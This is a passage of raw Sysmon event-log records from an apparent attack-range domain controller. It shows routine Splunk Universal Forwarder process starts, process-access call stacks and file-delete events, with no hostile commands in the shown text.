Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95F70D7CD52679A17C92F7D78E1150A4,SHA256=9AAC84CD6E21172737B3D9A24B946ABDCFC75B6DE78A489C640B7FF6D2D53FD1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002199838Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:02.720{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E5C6-6040-C54D-00000000AD01}3960C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199837Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:02.720{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199836Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:02.720{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199835Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:02.720{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199834Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:02.720{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199833Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:02.720{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E5C6-6040-C54D-00000000AD01}3960C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002199832Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:02.720{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E5C6-6040-C54D-00000000AD01}3960C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002199831Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:02.721{5ABCFE62-E5C6-6040-C54D-00000000AD01}3960C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002199850Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:03.830{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=831C3F17C7926EBBD00103D8D5C58AA5,SHA256=A7958EF1BC1BC0973735F91F464B2E0CD2084158FF59230F427D8FD2FC02B125,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199849Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:03.830{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D5B4E551BEF08C9A746C52DCD57B4A0B,SHA256=C080C1DDD7416359854611326198E5B1998D5443FED8C7E631083C2D8528D8F8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002199848Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:03.392{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E5C7-6040-C64D-00000000AD01}6744C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199847Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:03.392{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199846Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:03.392{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199845Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:03.392{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199844Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:03.392{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199843Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:03.392{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E5C7-6040-C64D-00000000AD01}6744C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002199842Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:03.392{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E5C7-6040-C64D-00000000AD01}6744C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002199841Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:03.393{5ABCFE62-E5C7-6040-C64D-00000000AD01}6744C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002199859Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:04.845{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B96D8E40214470EFF973ED6381206DDF,SHA256=151D7A8733B67F200F06DC60F026F592E8C6B15CC764BFFD0400AC9D78761842,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002199858Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:04.001{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E5C8-6040-C74D-00000000AD01}5432C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199857Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:04.001{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199856Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:04.001{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199855Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:04.001{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199854Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:04.001{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199853Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:04.001{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E5C8-6040-C74D-00000000AD01}5432C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002199852Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:04.001{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E5C8-6040-C74D-00000000AD01}5432C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002199851Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:04.003{5ABCFE62-E5C8-6040-C74D-00000000AD01}5432C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002199861Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:05.845{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D357DF9760F6A6FFEA4403B55D55F37,SHA256=9DE6A334F88E109D2EB0D30F0F4ADE8EEACEEB19E0F291C10546637C8615E7C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199860Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:05.001{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E2CFD0224BC4920B1DD28C329474C757,SHA256=A0B7A64E40EF6072EC1FE3E6DA2A06829516941C01A2840841168D1C615878D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199864Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:06.861{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59E6CB8EE42DE5C6EABEB914BFBD6F57,SHA256=BEDA1E4FF438E4A53A7EB4F9F604D2FA1B6ED846425E5697D9D9B738E329E1C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199863Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:06.673{5ABCFE62-84A2-603E-A500-00000000AD01}2876NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program 